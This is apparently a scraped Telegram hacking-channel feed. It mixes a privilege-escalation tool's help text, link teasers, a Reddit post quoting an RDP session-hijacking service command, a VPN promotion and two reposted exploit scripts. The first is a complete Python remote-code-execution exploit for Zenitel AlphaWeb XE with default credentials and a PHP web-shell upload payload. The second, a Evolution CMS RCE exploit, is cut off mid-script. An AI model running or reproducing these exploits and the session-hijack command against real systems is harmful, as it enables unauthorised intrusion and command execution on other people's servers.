Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
rootend is a python *nix Enumerator & Auto Privilege Escalation (https://www.kitploit.com/search/label/Privilege%20Escalation) tool. For a full list of our tools, please visit our website https://www.twelvesec.com/ Written by: nickvourd (https://github.com/nickvourd) (twitter (https://twitter.com/nickvourd)) maldevel (https://github.com/maldevel) (twitter (https://twitter.com/maldevel)) servo (https://github.com/gbkaragiannidis)
Usage
____/\_/ \___ >_______ /\___ >\___ > \/ \/ \/ \/ \/ rootend v.2.0.2 - Enumeration & Automation (https://www.kitploit.com/search/label/Automation) Privilege Escalation (https://www.kitploit.com/search/label/Escalation) tool. rootend is an open source tool licensed under GPLv3. Affected systems: *nix. Written by: @nickvourd of @twelvesec. Special thanks to @maldevel & servo. https://www.twelvesec.com/ Please visit https://github.com/twelvesec/rootend for more.. optional arguments: -h, --help show this help message and exit -v, --version show version and exit -a, --auto automated privilege escalation process -m, --manual system enumeration -n, --nocolor disable color -b, --banner show banner and exit -s, --suid suid binary enumeration -w, --weak weak permissions of files enumeration -p, --php PHP configuration (https://www.kitploit.com/search/label/PHP%20configuration) files enumeration -c, --capabilities capabilities enumeration -f, --full-writables world writable files enumeration usage examples: ./rootend.py -a ./rootend.py -m ./rootend.py -v ./rootend.py -b Specific categories usage examples: ./rootend.py -a -s ./rootend.py -m -w ./rootend.py -a -s -p ./rootend.py -m -w -c -p ./rootend.py -a -s -c -p -f *Use the above arguments with -n to disable color. ">___________ .__ _________
\__ ___/_ _ __ ____ | |___ __ ____ / _____/ ____ ____
| | \ \/ \/ // __ \| |\ \/ // __ \ \_____ \_/ __ \_/ ___\
| | \ /\ ___/| |_\ /\ ___/ / \ ___/\ \___
|____| \/\_/ \___ >____/\_/ \___ >_______ /\___ >\___ >
\/ \/ \/ \/ \/
rootend v.2.0.2 - Enumeration & Automation Privilege Escalation tool.
rootend is an open source tool licensed under GPLv3.
Affected systems: *nix.
Written by: @nickvourd of @twelvesec.
Special thanks to @maldevel & servo.
https://www.twelvesec.com/
Please visit https://github.com/twelvesec/rootend for more..

optional arguments:
-h, --help show this help message and exit
-v, --version show version and exit
-a, --auto automated privilege escalatio n process
-m, --manual system enumeration
-n, --nocolor disable color
-b, --banner show banner and exit
-s, --suid suid binary enumeration
-w, --weak weak permissions of files enumeration
-p, --php PHP configuration files enumeration
-c, --capabilities capabilities enumeration
-f, --full-writables world writable files enumeration

usage examples:
./rootend.py -a
./rootend.py -m
./rootend.py -v
./rootend.py -b

Specific categories usage examples:
./rootend.py -a -s
./rootend.py -m -w
./rootend.py -a -s -p
./rootend.py -m -w -c -p
./rootend.py -a -s -c -p -f

*Use the above arguments with -n to disable color.


Version

2.0.2

Supports
Python 2.x Python 3.x
Tested on
Python 2.7.18rc1 Python 3.8.2
Modes
Manual Auto
Exploitation Categories

Suid Binaries:
General Suids Suids for reading files Suids for creating file as root Limited Suids Custom Suids
Weak Permissions:
/etc/passwd /etc/shadow apache2.conf httpd.conf redis.conf /root
Weak Ownership:

___________________________
@hacking_Attack
@Hacking_Video
/etc/passwd /etc/shadow apache2.conf httpd.conf redis.conf /root
Capabilities:
General Capabilities Custom Capabilities With CAP_SETUID
Interesting Files:
PHP Configuration Files World Writable Files

Download Rootend (https://github.com/twelvesec/rootend)

___________________________
@hacking_Attack
@Hacking_Video
Hacking on Medium
DR. Driving Mod Apk | Unlimited Money + Gold


Dr. Driving Mod Apk- cool game, in which we need to ride in the city. It appears — it is simpler perhaps, however, we should…

Continue reading on Medium »
Hacking on Medium
Meet The Hackers Who Search For Missing People


No, it is not just in movies

Continue reading on ILLUMINATION »
Hacking on Medium
Why I’m Becoming a Prepper


Or at least, preparing for an uncertain future

Continue reading on Medium »
Hacking on Medium
Dorking Adventures 1


As the title suggests, this is the 1st in a series of articles that I hope to write on Google Dorking. In this we will look at serverlets.

Continue reading on Medium »
How to Get a Bigger Bounty by Optimizing Attack Parameters

This guide was written by whitehat Alexander Schlindwein, known for discovering the critical vulnerability in Fei Protocol discussed in…Continue reading on Immunefi »
Read more...
Why does tscon needs to be run as a service?
https://www.reddit.com/r/redteamsec/comments/por621/why_does_tscon_needs_to_be_run_as_a_service/

Taken from niiconsulting (https://niiconsulting.com/checkmate/2018/09/passwordless-rdp-session-hijacking/); Step 3: Creating a service that will execute tscon with system level privileges will hijack the session that has 3 as ID. CMD: sc create sesshijack binpath= “cmd.exe /k tscon 3 /dest:rdp-tcp#0” Why does tscon needs to be run as a service? Wouldn't tscon 3 also produce similar result? submitted by /u/w0lfcat (https://www.reddit.com/user/w0lfcat)
[link] (https://www.reddit.com/r/redteamsec/comments/por621/why_does_tscon_needs_to_be_run_as_a_service/) [comments] (https://www.reddit.com/r/redteamsec/comments/por621/why_does_tscon_needs_to_be_run_as_a_service/)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux TutorialsWhy a VPN is a Must and The 8 Benefits of Using one
A VPN (Virtual Portal Network) is a tool that allows you to use the internet securely. It does this by creating an encrypted tunnel between your devices and the remote servers you access. The added layer of protection keeps your data safe from snooping eyes that might be out to harm you or use your information for their shady agendas.

Most people are familiar with how VPNs hide your IP address and location while browsing online, but they do much more than that. Below we’ll look at the benefits you could enjoy from using one.

Safely access public WiFi

Public WiFi is great for staying online when you’re out and about, but it leaves you vulnerable to many different threats. You never know how well the network you’re using is secured, or if anyone else connected to it is actively trying to eavesdrop on traffic and steal your data.

Using a VPN gives you the peace of mind that nobody is tracking or intercepting your activity while you scroll through your social media feeds or shoot off emails at your favorite coffee shop. If you don’t want to compromise your privacy and security, but like using the free WiFi all around you, a VPN is a definite must for you.

Keep your information private

Using public WiFi leaves you particularly vulnerable to threats, but even your home WiFi needs a security boost.

You might not have any sensitive information to keep hidden from prying eyes, but you should still be mindful of your online security.

Your data is constantly tracked and analysed by your Internet Service Provider (ISP), the websites you visit, and the apps you use. They might sell your data to advertisers and other companies. In many jurisdictions this is illegal, but if the ISP does it anyway or they are hacked then who knows what nefarious hands might also get access to your info.

Installing a VPN can help you keep your information anonymous and secure. In some cases, it can even mask your IP address from your service provider. The encryption will also stop websites and apps linking your online activity to your computer.



Access restricted content

Have you ever been blocked from watching a sports stream because the content wasn’t available in your country? Well, with a VPN, that will be a thing of the past.

You can use a VPN to mask your location and connect to the websites you want from a region that can access the content you want to watch.

Work remotely securely

 The pandemic brought into focus is how unprepared many people are for the future of work. For one reason or another, many companies and their employees were not ready for off-site work.

If you are a business owner, investing in a VPN service can help your team work remotely without compromising the safety of your company secrets. Having a VPN in place allows people to access sensitive and confidential information they need to carry out their duties wherever they might be.

Easy security solution

Access to reliable online security is an ever-increasing need for the average internet user. You can not trust companies to look after your privacy, not with all the data breaches and privacy violations that go on. Unfortunately, most solutions are ridiculously expensive or needlessly complex to deploy, but not VPNs.

VPNs are user-friendly, cheap, and they offer the perfect level of security for most of us. Some plans even give you military-grade encryption. You might not need that level of protection, but you should take some time to learn more about VPNs and how they keep you safe online.

Get blanket security

Most of us use laptops for both work and play, but our internet usage is not limited to this one device. We use phones, tablets, and even our TV’s to access the internet, and as such, they too present a point of vulnerability when we’re online.

VPN providers realise this and no[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux TutorialsWhy a VPN is a Must and The 8 Benefits of Using one A VPN (Virtual Portal Network) is a tool that allows you to use the internet securely. It does this by creating an encrypted tunnel between your devices and the remote servers you access.…
w offer overarching security for all our devices. Each provider’s package will be different, but the very best will give you peace of mind across all your devices.

Get in on regional savings

Another benefit your VPN might help you enjoy, albeit sneakily, is savings on streaming subscriptions, flights, and many other subscription-based services. Not everyone can afford to pay the same prices for services as people in developed countries. In response to this, many companies offer their services at location-adjusted prices or with country-specific discount codes.

You can use your VPN to pay lower rates by switching your location. African, South American, and Middle-Eastern countries usually pay far less than people in the USA, UK, and EU for the same services. 

Avoid data and bandwidth throttling

Internet Service Providers throttle data and bandwidth to prevent congestion and ensure every client has reasonable internet usage. That sounds nice, but if you like to download massive files, play online games, or stream endlessly, throttling will throw a spanner in your works.

With a VPN, you can get around these limits and enjoy the very best experience online. A VPN hides your activity from your service providers so that even if they wanted to throttle your connection, they couldn’t because they can’t see any action from your IP.

Privacy and security are the top benefits of having a VPN, but as you’ve seen, there’s a lot more to VPNs you can enjoy. Getting one will give you the peace of mind to enjoy the internet without the hassles attached.

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit CollectorZenitel AlphaCom XE Audio Server 11.2.3.10 Shell Upload


Remote command execution exploit for Zenitel AlphaCom XE Audio Server versions up to 11.2.3.10 which have a web interface called AlphaWeb XE that allows for a remote shell upload.

MD5 | 7e648c2e86d13eff9019116bcae14157

Download



# Exploit Title: AlphaWeb XE - Authenticated Insecure File Upload leading to RCE (CVE-2021-40845)
# Date: 09/09/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor website: https://www.zenitel.com/
# Product website: https://wiki.zenitel.com/wiki/AlphaWeb
# CVE: CVE-2021-40845 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40845)
# Example: python3 CVE-2021-40845.py -u "http://$ip:80/" -c "whoami"
# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-40845

import requests
import base64
import argparse

# Default credentials, change them if it is necessary
admin_user = "admin"
admin_pass = "alphaadmin"
scripter_user = "scripter"
scripter_pass = "alphascript"


def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
my_args = parser.parse_args()
return my_args


def main():
args = get_args()
base_url = args.url
url_main = base_url + "/php/index.php"
url_upload = base_url + "/php/script_uploads.php"

command = args.command
uploaded_file = "poc.php"
url_cmd = base_url + "/cmd/" + uploaded_file + "?cmd=" + command

login_authorization = "Basic " + str(base64.b64encode((admin_user+':'+admin_pass).encode('ascii')).decode('ascii'))
upload_authorization = "Basic " + str(base64.b64encode((scripter_user+":"+scripter_pass).encode('ascii')).decode('ascii'))

headers_login = {
"Authorization": login_authorization,
"Cache-Control": "max-age=0"
}

headers_upload = {
'Authorization': upload_authorization,
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="92"',
'sec-ch-ua-mobile': '?0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'iframe',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
}

files = {
"userfile":(uploaded_file, "\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"\"; die; }?>"),
}

s = requests.session()
# Login as admin
s.get(url_main, headers = headers_login)
# Upload file
upload = s.post(url_upload, files=files, headers = headers_upload)
# Execute command
cmd = s.post(url_cmd)
print(cmd.text.replace("","").replace("",""))


if __name__ == "__main__":
main()



Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Evolution CMS 3.1.6 Remote Code Execution


https://4.bp.blogspot.com/-1sVwQJsRVpo/WWlvgaUDftI/AAAAAAAAIQM/9m_QfduSdAQi14Fs6kLQe2-YLO5Bx1iKQCLcBGAs/s1600/h87.png
Evolution CMS version 3.1.6 authenticated remote code execution exploit.

MD5 | 64efd7eabcd6619812539f02dfbb1c8a

Download
# Exploit Title: Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 15-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://evo.im/
# Software Link: https://github.com/evolution-cms/evolution/releases
# Version: 3.1.6
# Category: Webapps
# Tested on: Linux/Windows
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
# python3 exploit.py -h
from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
import sys

def main():
parser = argparse.ArgumentParser(description='Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)')
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-l', '--login', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\nEvolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
sleep(2)
exploit(args)

def exploit(args):

#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)
else:
print("\n[?] Check Adress...\n")
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
sleep(2)

# Check Host Status
try:
response = requests.get(args.host)
if response.status_code != 200:
print("[-] Address not reachable!")
sleep(2)
exit(1)

except requests.ConnectionError as exception:
print("[-] Address not reachable!")
sleep(2)
exit(1)
# Login and cookie set
session = requests.session()
url = args.host + "/manager/?a=0"
cookies = {
"mybb[lastvisit]": "1631537273",
"loginattempts": "1",
"mybb[lastactive]": "1631537588",
"mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
"evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
"KCFINDER_showname": "on",
"KCFINDER_showsize": "off",
"KCFINDER_showtime": "off",
"KCFINDER_order": "name",
"KCFINDER_orderDesc": "off",
"KCFINDER_view": "thumbs",
"KCFINDER_displaySettings": "off",
"evoq28fzr": "o0hd9im6q76pptjcsjeaa693os"
}

headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Content-Type": "application/x-www-form-urlencoded;",
"Accept": "*/*",
"Origin": args.host,
"Referer": args.host + "/manager/",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
[...]

___________________________
@hacking_Attack
@Hacking_Video